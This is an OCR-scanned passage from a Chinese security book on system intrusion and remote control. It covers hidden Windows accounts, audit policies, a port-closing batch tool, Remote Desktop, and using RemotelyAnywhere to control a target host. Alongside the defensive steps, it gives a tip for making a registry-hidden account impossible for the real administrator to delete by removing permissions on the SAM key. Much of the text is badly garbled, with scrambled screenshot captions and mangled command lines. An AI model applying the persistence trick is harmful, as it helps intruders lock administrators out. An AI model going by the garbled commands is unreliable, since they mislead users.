00,30.00,04,00,00,00,00,00,24,00.44,00,02,00,01,05,00,00,00,00,00,05,15,00\ 
00.00.b9.35.23.c3.baueb ba,d2.83f8.21.9b.e9.03.00.00.00.00.38.00.1b.03.02\ 
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step 图 打开 “命令 提示 符 ” 窗 口 ， 输 入 net 
user ty$ /del 命 令 ， 按 Enter 键 后 ， 即 可 将 建 
立 的 隐藏 账号 “ty$” 删 除 。 


而 管理 和 C\WINDOWS\system32wm- 一 口 x 


Ji crosoft Windows [版 本 10. 0. 17134. 319] a 
(c) 2018 Microsoft Corporation。 保 留 所 有 权利 。 


C:\Users\Administratormnet user ty$ /del 


C:\Users\Administrator> 


step 因 分 别 将 ty.reg 和 userreg 导 入 到 注册 表 
中 ， 即 可 完成 注册 表 隐 藏 账号 的 创建 。 此 
时 在 “本 地 用 户 和 组 ”窗口 中 ， 也 查看 不 


加 
到 隐藏 账号 。 
ET - oO x 
文件 骨 强 和 RA 下 看 MI 帮 有 (H) 
和 路 | 册 回 | 区 忌 | 回 加 
鼎 计算 人 ,管理 本 地 ) 名 称 Se 
Y 个 了 MT 只 著 Adminietrat 
© EsttEF 国 DefaubAec. 
团 于 4 二 看 器 天 deteuhusero 
国 共享 文件 天 四 cue 
本 本 地 用 户 和 组 i jin 
Rp 蔚 qon 
3 te te 
Pr 晤 woacusftc. 
志 设备 代理 路 
ve 
可 各 
如 展 荔 和 应 用 术科 


侈 提示 :利用 此 种 方法 创建 的 隐藏 账号 在 
注册 表 中 还 是 可 以 查看 到 的 。 为 了 保证 建 
立 的 隐藏 账号 不 被 管理 员 删 除 ， 还 需要 对 
HKEY _ LOCAL MACHINE\SAM\SAM 注 册 
表 项 的 权限 进行 取消 。 这 样 ， 即 便 是 真正 
的 管理 员 发 现 了 并 要 删除 隐藏 账号 ， 系 统 
就 会 报错 ， 并 且 无 法 再 次 赋予 权限 。 经 验 
不 足 的 管理 员 就 只 能 束手无策 了 。 


3.2 ”抢救 被 账号 入 侵 的 系统 


当 确 定 自己 的 计算 机 遭 到 入 侵 后 ， 
可 以 在 不 重 装 系统 的 情况 下 采用 如 下 方式 
“抢救 ”被 入 侵 的 系统 。 


加 3.2.1 揪 出 黑客 创建 的 隐藏 账号 


隐藏 账号 的 危害 是 不 容 忽视 的 ， 用 户 
可 以 通过 设置 组 策略 ， 使 黑客 无 法 使 用 隐 
藏 账号 登录 。 具 体操 作 步 又 如 下 。 
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step 国 右 击 “ 开 始 ” 按 钮 ， 在 弹出 的 快捷 菜单 


中 选择 “运行 ”选项 ， 打 开 “ 运 行 ”对 话 框 ， 
在 “打开 ”文本 框 中 输入 gpedit.msc。 


Windows 格 根 据 你 所 输入 的 名 称 , 为 你 打开 和 应 的 程序 、 
梧 xf we nemet Ws. 


FF(O): [gpeditmsd 


2 EE 
[sp 图 单 直 “确定 ”按钮 ， 打 开 “ 本 地 组 
策略 编辑 器 ”窗口 ， 依 次 展开 “计算 机 
配置 ”一 “Windows 设 置 ” 一 “安全 设 
置 ” 一 “本 地 策略 ” “审核 策略 ” 选项 。 


XH RN 5V) wR 
和 趾 | 直 器 | 其 蕊 日 中 


EC] EE 0 
bd ee 要 村 天 
et 3 天 
ee 4 条 站 天 
本 天 
Ca 有 天 
De bad 天 
i EE 天 人 
“四 4 天 上 
Bs ke 天 
本 用 ~GIR 配 
| 
nom 从 
3 Aen 
Ae 
= pes 
四 
Ere 
2 a 


[step 图 双击 右 侧 窗 口中 的 “审核 策略 更 改 ” 
选项 ， 打 开 “ 审 核 策 略 更 改 属性 ”对 话 
框 ， 勾 选 “ 成 功 ” 复 选 框 ， 单 击 “确定 ” 
按钮 保存 设置 。 


下 和 


ET] 


ee 


二 长 冯 直人 
[= 
Omn 


急 EEE TR 
丰 关 # 古 信和 , 二 打 殉 三 愉 竺 共生 入 ， 10921469) 


step 园 按照 上 述 步 又 ， 将 “审核 登录 事件 ” 
选项 做 同样 的 设置 。 


ta 人 训 关 


ee) 
口 =wm 


OA en 0 可不 全 行业 
EE 
有 二 ， 肖 少 风 这 于 三 人 Q92146 和 


Ce Tm] Law 


step 图 按照 Step02 和 Step03， 将 “审核 进程 
跟踪 ”选项 做 同样 的 设置 。 


克己 明 和 属性 ? x 


se 


人 
Beets) 
On 


启 。 了 RIM 
e216 


CI 
设置 完成 后 ， 用 户 就 可 以 在 “计算 机 
管理 ”窗口 中 的 “事件 查看 器 ”选项 下 

查看 所 有 登录 过 系统 的 账号 及 登录 的 时 
间 ， 如 果 有 可 疑 的 账号 ， 在 这 里 可 一 目 了 
然 ， 即 便 黑客 删除 了 登录 日 志 ， 系 统 也 会 
自动 记录 删除 日 志 的 账号 。 


侈 提示 : 若 在 确定 黑客 的 隐藏 账号 后 ， 
却 无 法 删除 ， 这 时 ， 可 以 通过 “命令 提示 
符 ” 窗 口 ， 运 行 net user“ 隐 藏 账号 ”“ 新 
密码 ”命令 来 更 改 隐藏 账号 的 登录 密码 ， 
使 黑客 无 法 登录 该 账号 。 


第 3 章 ”系统 入 侵 与 远程 控制 的 防护 策略 


3.2.2 ”批量 关闭 系统 危险 端口 


众所周知 ， 网 络 上 木马 病毒 无 孔 不 日 绽 


入 。 在 各 种 防护 手段 中 ， 关 闭 系 统 中 的 危 
险 端口 是 非常 重要 的 ， 但 是 对 于 计算 机 新 
手 来 说 ， 哪 些 端口 是 危险 的 ， 哪 些 端口 是 
不 危险 的 ， 并 不 清楚 。 下 面 就 来 介绍 一 些 
自动 关闭 危险 端口 的 方法 ， 帮 助 用 户 扫 描 
并 关闭 危险 的 端口 。 

对 于 初学 者 来 说 ， 一 个 一 个 地 关闭 危 
险 端 口 太 麻烦 了 ， 而 且 也 不 知道 哪些 端口 
应 该 关闭 ， 哪 些 端 口 不 应 该 关闭 。 不 过 用 
户 可 以 使 用 一 个 叫 作 “危险 端口 关闭 小 助 
手 ” 的 工具 来 自动 关闭 端口 ， 具 体 的 操作 
步骤 如 下 。 
[step 加 下 载 并 解压 缩 “ 危 险 端 口 关闭 小 助 


手 ” 工 具 ， 在 解压 的 文件 中 双击 “自动 关 
闭 危 险 端口 .bat” 批 量 处 理 文件 ， 则 可 自动 
打开 “命令 ”窗口 ， 并 在 其 中 闪 过 关闭 状 


4 免 要 流行 里 中 病毒 及 木马 后 门 的 仿 拓 ! 
me 和 | 注 豆 。 不 要 关闭 ， 请 按 任 音 桂 进 行 Yin 服务 器 过 小 策略 | rer 


step 回 关闭 结束 后 ， 系 统 中 的 危险 端口 就 全 
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部 被 关闭 掉 了 。 当 程序 停止 后 ， 不 要 关闭 
“命令 ”窗口 ， 这 时 按 下 任意 键 ， 或 继续 
运行 “Win 服 务 器 过 滤 策 略 ”， 然 后 再 进行 
木马 服务 端口 的 关闭 ， 全 部 完成 后 ， 系 统 
才 做 到 真正 的 安全 。 


EE Dllturs Tr 


Devil 1. Mt 


名 Eh 和 i 

Icqm 

Ep i 
马 Priotrity 默 认 服 

Phineas Phucke 

习 Vodoo 默 认 服务 端口 … 


马 Masters Paradis 


闭 木 马 只 ncrash 默 认 服务 


上 
3 
站 


[step 图 使 用 “危险 端口 关闭 小 助手 ”工具 
还 可 以 手工 修改 、 自 动 关 闭 端口 ， 利 用 该 
功能 可 以 把 最 新 的 端口 添加 到 关闭 的 列表 
中 。 用 记事 本 打开 “关闭 危险 端口 .bat” 
文件 ， 即 可 在 其 中 看 到 关闭 端口 的 重要 语 
名 rem ipconfig -w REG -p "HFUT_SECU'" -r 
"Block UDP/138" -f *+0:138:UDP -n BLOCK 
-Xx >nul， 其 中 UDP 参数 用 于 指定 关闭 端口 
使 用 的 协议 ，138 参 数 代表 要 关闭 的 端口 。 


EC 
laooho off 


apupdate Snul 
ean For Client cnly 
jipeontig -w REG ~p “HFUT_SECU” -9 -x ?ml 


ie ~w REG ~p “HFUT_SEC” - "lock TDP 
~ KEG ~p “HEUT_SECU” 1 


“Block UDP 


[Eee 国 参照 上 述 语句 ， 可 以 手工 添加 语句 ， 

将 一 些 新 的 木马 病毒 使 用 的 端口 加 入 到 关 
闭 列表 中 ， 例 如 ， 要 关闭 新 木马 使 用 的 8080 
端口 ， 则 可 以 添加 如 下 语句 rem ipconfig 
-w REG -p "HFUT SECU" -r "Block 
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UDP/8080" -f *+0:8080:UDP -n BLOCK -x 
>nul， 添 加 完成 后 的 显示 效果 如 下 图 所 示 。 


ot 5 o x 


139" -4 #0:139:TCP ~n BLOCE -x Smul 
SANBh (去掉 NEN 生效 ) 


py 将 该 文件 保存 为 .bat 文 
重新 运行 即 可 关闭 新 添加 的 端口 。 


3.3 ”通过 远 
系统 


通过 远程 控制 工具 入 侵 目 标 主机 系统 
的 方法 有 多 种 ， 最 常见 的 有 telnet、ssh、 
vnc、 远 程 桌面 等 技术 ， 除 此 之 外 还 有 一 
些 专门 的 远程 控制 工具 ， 如 RemotelyAny- 
where、PcAnywhere 等 。 


3.3.1 什么 是 远程 控制 


远程 控制 是 在 网 络 上 由 一 台 计 算 机 
〈 主 控 端 /客户 端 ) 远 距 离 去 控制 另 一 台 计 
算 机 《被 控 端 /服务 器 端 ) 的 技术 ， 而 远程 
一 般 是 指 通过 网 络 控制 远 端 电脑 ， 和 操作 
自己 的 电脑 一 样 。 

远程 控制 一 般 支 持 LAN、WAN、 拨 号 
方式 、 互 联网 方式 等 网 络 方式 。 此 外 ， 有 
的 远程 控制 软件 还 支持 通过 串口 、 并 口 等 
方式 来 对 远程 主机 进行 控制 。 随 着 网 络 技 
术 的 发 展 ， 目 前 很 多 远程 控制 软件 提供 通 
过 Web 页 面 以 Java 技 术 来 控制 远程 电脑 ， 这 
样 可 以 实现 不 同 操作 系统 下 的 远程 控制 。 
远程 控制 的 应 用 体现 在 如 下 几 个 方面 。 

(1) 远程 办 公 。 这 种 远程 的 办 公 方 式 


远程 控制 工具 入 侵 


不 仅 大 大 缓解 了 城市 交通 状况 ， 还 免 去 了 
人 们 上 下 班 路 上 奔波 的 辛劳 ， 更 可 以 提高 
企业 员工 的 工作 效率 和 工作 兴趣 。 

(2) 远程 技术 支持 。 一 般 情况 下 ， 远 
距离 的 技术 支持 必须 依赖 技术 人 员 和 用 户 
之 间 的 电话 交流 来 进行 ， 这 种 交流 既 耗 时 
又 容易 出 错 。 有 了 远程 控制 技术 ， 技 术 人 
员 就 可 以 远程 控制 用 户 的 电脑 ， 就 像 直 接 
操作 本 地 电脑 一 样 ， 只 需要 用 户 的 简单 帮 
助 就 可 以 看 到 该 机 器 存在 问题 的 第 一 手 材 
料 ， 很 快 找到 问题 的 所 在 并 加 以 解决 。 

(3) 远程 交流 。 商 业 公司 可 以 依靠 远 
程 技术 与 客户 进行 远程 交流 。 采 用 交互 式 
的 教学 模式 ， 通 过 实际 操作 来 培训 用 户 ， 
从 专业 人 员 那 里 学 习 知 识 就 变 得 十 分 容 
易 。 而 教师 和 学 生 之 间 也 可 以 利用 这 种 远 
程控 制 技术 实现 教学 问题 的 交流 ， 学 生 可 
以 直接 在 电脑 中 进行 习题 的 演算 和 求解 ， 
在 此 过 程 中 ， 教 师 能 够 轻松 看 到 学 生 的 解 
题 思路 和 步骤 ， 并 加 以 实时 的 指导 。 

(4) 远程 维护 和 管理 。 网 络 管理 员 或 
者 普通 用 户 可 以 通过 远程 控制 技术 对 远 端 
计算 机 进行 安装 和 配置 软件 、 下 载 并 安装 
软件 修补 程序 、 配 置 应 用 程序 和 进行 系统 
软件 设置 等 操作 。 


3.3.2 ”通过 Windows 远 程 桌面 实现 远程 
控制 


远程 桌面 功能 是 Windows 操 作 系统 自 带 
的 一 种 远程 管理 工具 ， 它 具有 操作 方便 、 
直观 等 特征 。 如 果 目 标 主机 开启 了 远程 桌 
面 连接 功能 ， 就 可 以 在 网 络 中 的 其 他 主机 
上 连接 控制 这 台 目 标 主机 了 。 

在 Windows 10 操 作 系统 中 开启 远程 桌 
面 的 具体 操作 步骤 如 下 。 
[step 图 右 击 “ 此 电脑 ”图 标 ， 在 弹出 的 快捷 
菜单 中 选择 “属性 ”选项 ， 打 开 “ 系 统 ” 
窗口 。 
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个 国 < 六 控制 国 ， 双 筑 Y 吕 种 要 党 出 国友 村 
et 查看 有 关 计 算 机 的 基本 信息 
四 和 Windows 睹 # 
© eu > 
吐 Windows10 


[step 图 单 去 “远程 设置 ”， 打 开 “ 系 统 属 
性 ”对 话 框 ， 在 其 中 名 选 “ 允 许 远程 协助 
连接 这 台 计 算 机 ” 复 选 框 ， 设 置 完毕 后 ， 
单 击 “ 确 定 ” 按 钮 ， 即 可 完成 设置 。 


系统 必 性 x 


计算 机 各 硬件 ”高 性 。 系统 保护 运程 
还 和 办 和 
回 区 许 远 怀 协 册 连接 这 台 计 算 机 (R) 


笑语 用 远 竺 协 动 扣 信息 


云 和 点 而 
加 所 一 个 迁 项 ， 扒 后 插 定 认可 以 连接 
加 不 办 许 去 人 连接 到 此 计算 tD) 


口 * 访 远 且 和 地上 t 计 算 J) 


“远程 桌面 连接 ”选项 ， 打 开 “ 远 程 桌 面 
连接 ”窗口 。 
又 远 色 点 而 连接 一 x 
远程 桌面 
Wr 王 


ED 
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step 图 选择 “开始 ”一 “Windows 附 件 ” 一 


[step 图 单 去 “显示 选项 ”按钮 ， 展 开 即 可 看 
到 选项 的 具体 内 容 。 在 “常规 ”选项 卡 的 
“计算 机 ”下 拉 列 表 中 选择 需要 远程 连接 
的 计算 机 名 称 或 1P 地 址 ; 在“ 用户 名 ” 文 


本 框 中 输入 相应 的 用 户 名 。 
中 远近 三 x 
外 远程 桌面 
连接 
视 规 。 旺 示 。 3 交大 和 高 有 
ES 
te 
计算 机 (C): |192.168.1.103 
FBS [Administratod 
着 你 过 时 全 和 你 自问 玫 | 
口 和 许 各 大 R) 
这 拉 计 
rn nop zi TPR 
| RG) PR 所 日- 
2 amO) oa 


[sep 图 选择 “显示 ”选项 卡 ， 在 其 中 可 以 设 
置 远程 桌面 的 大 小 、 颜 色 等 属性 。 


邓 远 健 点 本 连接 


一 x 
月/ is 硬 

”连接 
常规 ”显示 ”本 地 资源 体验 。 高 级 


号 地 本 
LS 
小 | x 
二 一 一 
口 梅 我 的 所 有 监视 占用 于 远程 会 舌 (U) 
冯 
本 选择 远程 会 话 的 颜色 深度 (C). 
时 2 人 


| 
| 回 全 殖 呈 示 时 显示 这 拉 性 (B) 


2 ] 


[step 图 如 果 需 要 远程 桌面 与 本 地 计算 机 文件 
进行 传输 ， 则 需 在 “本 地 资源 ”选项 卡 下 
设置 相应 的 属性 。 


者 动 (H) 
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双 远 民 高 本寺 综 
| 远程 桌面 
> 连接 


全 规 ”显示 ”本 地 资 基 体验 ”高 级 
运往 页 
| 


应 所 Window: 后 全 刍 (0: 


仅 在 全 屏 旺 寺 对 
A Akt+Tab 
本 地 设备 各 资源 


二 远 泽 他 要 在 远程 会 舌 中 使 用 的 设备 各 资源。 


Bnn [ls 


访 雪 全 和 IMI- 
2 MRO) 


连接 (N) 帮助 (H) 


[step 国 单 去 “详细 信息 ”按钮 ， 在 “本 地 设 
备 和 资源 ”中 选择 需要 的 驱动 器 后 ， 单 击 
“确定 ”按钮 ， 返 回 到 “远程 桌面 连接 ” 
对 话 框 中 。 
了 过 全 间 丰 汪汪 


| 运程 桌面 
WY 品 


书 地 大 内 大 
二 有 要 下 过 符 全 古 和 全 59 运作 十 划 史上 四 充 备 宙 要 理 ， 


Owo 
MWindons10 tc) 
Oy 


回 赂 ES 生 A 并 


连接 。 


[step 图 单 去 “连接 ”按钮 ， 弹 出 “远程 桌面 
连接 ”对 话 框 ， 显 示 正 在 启动 远程 连接 。 


驰 还 esrhs 和 


用 ess 
D10216a1103 


EE [= 


EE 


[step 了 启动 远程 连接 完成 后 ， 将 弹出 
“Windows 安 全 性 ”对 话 框 。 在 “用 户 名 ” 
文本 框 中 输入 登录 用 户 的 名 称 ; 在 “ 密 
码 ” 文 本 框 中 输入 登录 密码 。 


输入 从 


这 些 攒 振 将 用 于 连 按 192.168.1.103。 


@ Administrator 


DESKTOP-JMQAAOB\Administrator 


记 住 我 的 拖 据 


更 多 选项 


确定 取消 


Step 有 单 去“ 确定 ”按钮 ， 会 弹出 一 个 信息 
提示 框 ， 提 示 用 户 是 否 继续 连接 。 


5 亏本 看 连接 3 


逢 痊 赋 第 王 ; 因此 远程 计算 机 无 法 甬 过 身份 浴 证 。 继续 操 
证 书 名 称 
局 来自 远程 计算 机 的 证 书 中 的 名 称 
1SER-20150807OA 
证 书 弹 误 
答 证 远程 计算 机 的 证 书 时 遇 到 [下列 误 


生 证书 来 自 不 信任 的 证 书 验 证 机 构 * 
您 起 连接 到 运程 点 而 而 各 鸣 这 些 证 书 模 误 四 ?7 
不 再 调 癌 我 是 否 连接 到 此 计 其 机 D) 
下 看 二 书 册 是 0) 


Step 可 单 击 “是 ”按钮 ， 即 可 登录 到 远程 计 


算 机 桌面 ， 此 时 可 以 在 该 远程 桌面 上 进行 
任何 操作 。 
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另外 ， 在 需要 断 开 远程 桌面 连接 时 ， 
只 需 在 本 地 计算 机 中 单 击 远程 桌面 连接 窗 
口上 的 “关闭 ”按钮 ， 弹 出 “远程 桌面 连 
接 ” 提 示 框 。 单 击 “ 确 定 ” 按 钮 ， 即 可 断 
开 远 程 桌面 连接 。 


人 移 提 示 : 在 进行 远程 桌面 连接 之 前 ， 需 要 
双方 都 匀 选 “允许 远程 用 户 连 接 到 此 计算 
机 ” 复 选 框 ， 否 则 将 无 法 成 功 创建 连接 。 


3.4 ”使 用 RemotelyAnywhere 
[ 具 入 侵 系 统 


RemotelyAnywhere 工 具 是 利用 浏览 器 
进行 远程 连接 入 侵 控 制 的 小 程序 ， 使 用 时 需 
要 实现 在 目标 主机 上 安装 该 软件 ， 并 知道 该 
主机 的 连接 地 址 及 端口 ， 这 样 其 他 任何 主机 
都 可 以 通过 浏览 器 来 访问 目标 主机 了 。 


3.4.1 安装 RemotelyAnywhere 


安装 RemotelyAnywherel 软 件 ， 具 体操 首 
作 步 又 如 下 。 
[sep 回 运行 RemotelyAnywhere 安 装 程序 ， 在 
弹出 的 对 话 框 中 单 击 Next 按 钮 。 


起 RemotsyAmywhere x 


RemotelyAnywhere 
Version 12.4.4063 


Microsoft Windows 
10 / 8.1/ 7 / 2008R2 / 2012R2 / 2016 
remote administration right from your 
browser 


Remotély 碟 


Anywhere 


http://remotelyanywhere.com 
info@remotelyanywhere.com 


Copyright © 1998-2018 LogMeIn, Inc. 


Next 》 Cancel 


step 图 弹出 RemotelyAnywhere License 
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Agreement 对 话 框 ， 单 击 [Agree 按 钮 。 


项 RemotelyAnywhere License Agreement x 


[Terms & Conditions of Use for LogMeln’s Cloud 和 ^ 
Services 


IMPORTANT - PLEASE READ THESE TERMS AND 
CONDMONS CAREFULLY WHEN PURCHASING 
OR ACCESSING THE LISTED SERVICES ANDIOR 
soFTWARE FROM LOGMEIN. INC. CLMI INC”) OR 
ITS WHOLLY OWNED SUBSIDIARY, LOGMEIN 
Dy IRELAND LTD. CLMI IRELAND"). AS APPUICABLE 
y (LMIINC, AND LMI IRELAND, TOGETHER 
REFERRED TO HEREIN AS LN These terms 
land conditions CTerms”) govem the use and 
licensing by LMl of the following LogMeinB cloud- 
based semice(s} AppGuru™, LogMein Backup® 
BoldChate, LogMelns Central™, Cubby™, LogMeln 
Hamachi®, LogMeln for Android of IOS, join. me?®, 
LogMein Pro®, LogMeln Rescue® or LogMeln® 
Rescuerhoblle™. and Xvely™. along with the 


Be Comoel 


step 图 弹出 Software options 对 话 框 ， 选 中 


Custom 单 选 按钮 ， 可 以 手工 指定 软件 安装 
配置 项 ， 本 实例 选中 Typical 单 选 按钮 ， 使 
用 默认 配置 ， 单 击 Next 按 钮 。 
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step 园 弹出 Start copying files 对 话 框 ， 显 示 
已 配置 信息 ， 信 息 中 说 明 连 接 服 务 器 的 端 
口 为 2000， 单 击 Next 按 钮 。 


臣 RemotelyAnywhere x 
Start copying files 


Review settings before copying files. 


Setup has enoueh inforaation to start copying the grogran 得 les，IE you 
want to evden er chenee eny setting ellek Pook FE You ers setisfidd vith 
He settlaes ellok ert to begin epyine Giles 
Crent settings 
Destination path 
Ci \progr en Files (x86) henotelyhaywhere\ 
Rastslyhayskhere vill be railable en the folloving TCP/IP ports 
NIP: 2000 


i 5 


弹出 Install status 对 话 框 ，Remotely 
Anywhere 程 序 正 在 安装 。 


期 RemoteyAnywhere X 


Software options 
Cheose the setup type that best suits your needs 


You oun install RemotelyAnywhere with defaslt settings, or you ean 
choose to specify then or copy settings from sn existing 
RemotelyAnywhere installation on your network 


图 Tyiod 
OO custom 


hk al 


图 弹出 Choose Destination Location 对 


话 框 ， 单 击 Browse 按 钮 ， 可 以 改变 安装 
目录 ， 本 实例 采用 默认 配置 ， 单 击 Next 
按钮 。 


期 RemotelyAnywhere Destination Folder x 


Choose Destination Location 
Setup will install RenotelyAnyhere in the folder listed below 


To install to this folder, click Next, To install to a different folder, 
slick Brovse and seleot unother folder 


Destination folder 
C:\Program Files (x86)\henotelyAnywhere\ Browse 


GE tea 


基 RemotelyAnywhere Instalation — 过 


Install status 
Setup is perforning the requested wetion 


本 生生 
| 


| 


安装 完成 后 ， 弹 出 Setup Completed 对 
话 框 ， 对 话 框 中 标明 可 以 使 用 地 址 http:// 
DESKTOP-JMQAA08:2000 和 http:Wipaddress: 
2000 连 接 服务 器 ， 单 击 Finish 按 钮 。 


| 者 RemoteyAnywhere x| 


Setup Completed 


Setup has finished installing Reaotelyhnyyhere on 
your computer. 


To start RenotelyAnyvhere... 


Erom within your donain, you can point your 
browser te http://DESETOP-RJOMDC 2000 


y Erom outside your domain type 
http://ipadiress-2000 Where tpaddress is the 
adiress of your computer 


hen promptea for login eredentials, enter en 
Ma stor usernme aag presswor 


ek Easd 
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step 图 弹出 Windows 验 证 页 面 ， 在 其 中 需要 
输入 此 计算 机 的 用 户 名 和 密码 。 


Remotely, 四 


Windows 了 下 
请 输入 此 计算 机 的 用 户 吉 和 宇 码 


用 户 名 Amnisirator 
密码 sere ee 


EE 


显 款 高 R 造 质 >> 


单 击 “登录 ”按钮 ， 弹 出 Remotely 
Anywhere 激 活 方式 选择 界面 ， 可 以 选中 
“我 已 是 RemotelyAnywhere 用 户 或 已 具 
有 RemotelyAnywhere 许 可 证 ” 单 选 按 钮 
进行 激活 ， 也 可 以 选择 “我 希望 现在 购买 
RemotelyAnywhere ”在 线 激活 ， 本 实例 
选择 “我 想 免费 试用 ”， 单 击 “ 下 一 步 ” 
按钮 。 


grotey 
欢迎 使 用 RemotelyAnywhere 


软 站 忆 实 疫 ， 但 伯 需 要 在 的 计算 人 上 汶 活 ， 


) 我 已 是 RemolelyAnywhee 用 户 或 刀具 有 FemeteyAnrwhere 许可 下 
) 汽 须 望 现在 内 天 RemoleWAnywhere 


图 我 起 免 吕 试 月 
IE 到 


[step 图 在 弹出 界面 的 “电子 邮件 地 址 ”文本 
框 中 输入 激活 使 用 的 邮箱 地 址 ， 并 在 “ 产 
品类 型 ”下 拉 列 表 中 选择 试用 产品 类 型 ， 
本 实例 采用 “服务 器 版 ”， 单 击 “ 下 一 
步 ” 按 钮 。 


Ri Ea 


免费 试用 30 天 


为 了 眉 用 RemotelyAnywhere， 息 和 要 注册 提 民 试用 覆 。 清 左下 面 流 入 从 的 电 了 部 村 夫 址 。 


电子 邮件 地 志 : 5255 生 十 BD@90 I ] 
产品 类 型 | vy 


step 图 在 弹出 的 界面 中 依次 输入 指定 内 容 ， 
单 击 “ 下 一 步 ” 按 钮 。 

step 贺 RemotelyAnywhere 激 活 成 功 ， 需 要 重 
新 启动 RemotelyAnywhere 程 序 ， 单 击 “ 重 
新 启动 REMOTELYANYWHERE” 按 钮 。 
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Remorey 级 


Anywhere 


先 费 试用 30 天 


a 天 要 过 此 用 ， 促 9 计 站 
二 下 Inrarnet， RARER, 


电子 时 御 地 址 5255 和 an -om 
产 吕 辫 本 务 若 林 


人 嫩 RemotelyAnywhere 己 激 活 。 


emolelyAnywhere 驮 全， 重 攻 才 能 全- 


到 hemcteyAnywhere 是 多 可 能 要 30 秒 ， 昌 去 上 控 名 乓 ， 交 移 坟 可 能 和 外 页 面 二 可 月 ， 这 是 下 
等 香 0 地 ， 天 单 二 二 对 的 “ 宙 灯 ”t， 


3.4.2 ”连接 入 侵 远程 主机 


安装 RemotelyAnywhere 软 件 并 成 功 激 训 
活 后 ， 就 可 以 通过 浏览 器 连接 入 侵 目标 主 
机 了 ， 具 体 的 操作 步骤 如 下 。 

[step 回 打开 浏览 器 ， 然 后 在 地 址 栏 中 输入 
RemotelyAnywhere 安 装 过 程 中 提示 的 地 
址 ， 通 用 格式 为 “http://{ 目 标 服 务 器 IP| 
主机 名 | 域名 }:2000”， 本 实例 使 用 https:// 
desktop-rjknmoc:2000/main.html 进 行 讲解 ， 
在 “用 户 名 ”文本 框 和 “密码 ”文本 框 中 
输入 有 效 的 远程 管理 账户 的 信息 ， 默 认 使 
用 Administrator 账 号 登录 。 


Remotely 民 


Windows 验证 


请 输入 此 计算 机 的 用 户 名 和 密码 


用 户 名 Adrinistrator 
5 EE 


NTM 
NTLM 验证 使 用 您 当前 的 Windows 登录 证 书 来 验证 您 针 EE 
对 主机 的 身份 标识 
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step 图 单 击 “登录 ”按钮 ， 进 入 Remotely 
Anywhere 远 程 管理 界面 ， 左 侧 显 示 管 理 功 


能 列表 ， 用 户 可 以 使 用 不 同 的 管理 功能 对 
远程 主机 进行 多 功能 全 方位 的 管理 操作 。 


[ssp 图 单 二 “继续 ”按钮 进行 远程 主机 信息 
查看 与 管理 ， 默 认 显 示 “ 控 制 面板 ”管理 
功能 界面 。 


i 


“mam 图 


通过 该 页 面 可 以 快速 了 解 远 程 服务 器 
的 多 种 状态 、 信 息 ， 具 体内 容 如 下 。 

(1) 系统 信息 : 显示 系统 版 本 、CPU 
型 号 、 物 理 内 存 使 用 情况 、 总 内 存 〈 包 括 


虚拟 内 存 ) 使 用 情况 、 
登录 系统 账户 。 

(2) 事件 : 显示 最 近 发 生 的 系统 事 
件 ， 默 认 显 示 5 个 事件 。 

(3) 进程 : 显示 进程 的 系统 资源 占用 
情况 ， 默 认 以 CPU 占用 比例 为 序 ， 显 示 CPU 
占用 率 最 高 的 5 个 进程 。 

(4) 已 安装 的 修补 程序 : 最 近 安 装 的 
系统 补丁 ， 默 认 显示 5 个 补丁 信息 。 

(5) 网 络 流量 : 动态 显示 网 络 流量 
信息 。 

(6) 磁盘 驱动 器 : 所 有 分 区 的 空间 使 


系统 已 启动 时 间 、 
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用 情况 。 


(7) 计划 的 任务 : 显示 最 后 执行 的 任 
务 计 划 ， 默 认为 5 个 。 
(8) 最 近 的 访问 : 系统 最 近 访 问 记录 。 


(9) 日 记 : 管理 员 可 在 此 区 域 编辑 管理 
日 记 。 


3.4.3 ”远程 操控 目标 主机 


当成 功 侵入 目标 主机 后 ， 就 可 以 通过 
浏览 器 远程 操控 目标 主机 了 ， 具 体 的 操作 
步骤 如 下 。 
[sep 园 选择 左 侧 列表 中 的 “远程 控制 ” 选 
项 ， 在 右 侧 窗 格 中 显示 了 远程 主机 的 界 
面 ， 通 过 该 窗 格 可 以 利用 本 地 的 鼠标 、 键 
盘 、 显 示 器 直接 控制 远程 主机 。 在 窗 格 上 
侧 有 部 分 工具 可 以 使 用 ， 包 括 颜 色调 整 、 
远程 桌面 大 小 调整 等 。 


[图 选择 大 侧 列表 中 的 “文件 管理 器 ” 选 
项 ， 在 右 侧 窗 格 中 显示 了 本 地 和 远程 主机 
的 资源 管理 器 ， 在 两 个 资源 管理 器 中 可 以 
随意 地 拖 昌 文件 ， 以 实现 资料 互 传 


[step 图 选择 堪 仙 列表 中 的 “桌面 共享 ” 选 
项 ， 在 右 侧 窗 格 中 显示 了 实现 桌面 共享 的 
操作 方法 。 按 照 提示 方法 右 击 桌 面 状态 栏 
的 程序 图 标 ， 在 弹出 的 快捷 菜单 中 选择 
Share my Desktop... 选 项 。 


率 面 共享 


人 用 此 上 全 功能 可 以 下 再 吏 信任 的 朋友 或 同事 运程 查看 或 控制 北 计算 机 的 点 面 。 
下 


| 
0 

公认 便便 式 半 人 到 而 太 站 

在 而 
Se 


央 | 二 是 到 
加 机 二 ea 大 醒 , 两 从 Remalewhnrwhere 系 织 人 加 中 这 搓 “ 虎 硬 共 字 "。 


roy Ca 


请 来 宾 与 您 一 起 工作 ” 单 选 按钮 ， 单 击 
“下 一 步 ”按钮 。 

国 点 西 # 享 x 
桌面 共享 


邀请 受信 任 的 朋友 或 同事 查看 或 控制 抱 的 刘 面 所 揽 请 的 人 员 检 能 看 到 您 进行 的 损 作 ， 并 县 
如 果 获 得 您 的 许可 ， 他 们 可 以 控制 起 的 键 鱼 和 自 标 。 


轿 道 清 来 喜与 您 一 起 工作 
〇 〇 查看 符 定 的 洲 青 


< 上 -和 加 取消 


[step 图 弹出 “邀请 详情 ”对 话 框 ， 可 以 在 该 
对 话 框 中 配置 邀请 名 ， 默 认 按时 间 显 示 ， 
方便 以 后 查看 ， 还 可 以 设置 本 次 邀请 的 有 
效 访问 时 限 ， 在 最 后 一 个 文本 框 中 输入 被 
邀请 人 连接 目标 主机 使 用 的 地 址 ， 全 部 选 
择 默 认 配置 ， 单 击 “ 下 一 步 ” 按 钮 。 

[step 图 弹出 “已 创建 邀请 ”对 话 框 ， 在 文 
本 框 中 显示 了 被 邀请 人 获得 的 地 址 ， 可 以 
通过 单 击 “ 复 制 ” 和 “电子 邮件 ”两 个 按 
钮 ， 让 被 邀请 人 获得 邀请 地 址 ， 单 击 “ 完 
成 ”按钮 ， 完 成 本 次 邀请 。 
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EE x 
六 请 详情 


为 此 者 请 深入 一 个 名 称 ， 以 便 以 后 可 以 引 用 亡 . 
道 请 Saturday December 01, 2018 13:42:59 


